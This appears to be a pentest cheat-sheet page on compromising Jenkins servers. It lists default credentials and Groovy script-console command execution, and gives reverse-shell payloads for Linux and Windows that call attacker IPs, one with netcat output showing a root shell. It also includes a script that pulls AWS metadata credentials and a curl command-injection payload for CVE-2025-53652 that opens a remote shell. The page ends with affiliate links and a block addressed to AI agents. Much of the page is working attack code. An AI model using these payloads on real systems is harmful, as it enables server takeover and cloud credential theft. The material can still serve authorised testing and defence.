# Jenkins ## Discovery/Footprinting Jenkins runs on Tomcat port 8080 by default. It also utilizes port 5000 to attach slave servers. ## Open Registration ``` /signup /jenkins/signup ``` ## Enumeration `http://jenkins.inlanefreight.local:8000/configureSecurity/`

`http://jenkins.inlanefreight.local:8000/login?from=%2F`

Default credentials such as `admin:admin` or does not have any type of authentication enabled. It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test ## Admin access - Script Console Before 2.0: Admin access ``` http://jenkins_server/script ``` Groovy scripts could be executed: #### Linux `http://jenkins.inlanefreight.local:8000/script` ```groovy def cmd = 'id' def sout = new StringBuffer(), serr = new StringBuffer() def proc = cmd.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println sout ```

#### Windows ```groovy def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); ``` ### Reverse Shell #### Linux ```groovy r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ```shell-session $ nc -lvnp 8443 listening on [any] 8443 ... connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 57844 id uid=0(root) gid=0(root) groups=0(root) /bin/bash -i root@app02:/var/lib/jenkins3# ``` #### Metasploit `msf > use exploit/multi/http/jenkins_script_console` #### Windows {% embed url="" %} {% embed url="" %} ```groovy String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ## Retrieve AWS credentials Access to Groovy Console ```groovy def tokenCommand = 'curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"' def dataCommand = 'curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/' def proc1 = ['sh', '-c', tokenCommand].execute() def token = proc1.text.trim() // Get the token from the first command proc1.waitFor() if (proc1.exitValue() == 0) { def proc2 = ['sh', '-c', dataCommand.replace('$TOKEN', token)].execute() def errorBuffer = new StringBuffer() proc2.consumeProcessErrorStream(errorBuffer) println(proc2.text) // Print the response println(errorBuffer.toString()) // Print error messages, if any } else { println("Failed to retrieve token: ${proc1.err.text}") } ``` ## No admin access but could add or edit build steps {% embed url="" %} {% embed url="" %} Add a build step, add "Execute Windows Batch Command" and enter:

``` powershell -c command ```

## CVE-2025-53652 - Command Injection via Git Parameter ``` curl -kv 'http://jenkins:8080/job/[buildName]/build' -X POST \ -H 'Cookie: [cookie];' \ --data-urlencode 'Jenkins-Crumb=[crumb]' \ --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"\$(bash -c \"bash &> /dev/tcp/10.9.49.196/1270 <&1\")"}}' ``` {% embed url="" %} {% embed url="" %} ## CVE-2024-23897 - Arbitrary File Read Vulnerability Leading to RCE {% embed url="" %} {% embed url="" %} {% embed url="" %} ## CVE-2024-43044 - Arbitrary file read that allows an agent to fetch files from the controller {% embed url="" %} ## Tools JenkinsVulnFinder {% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/jenkins.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.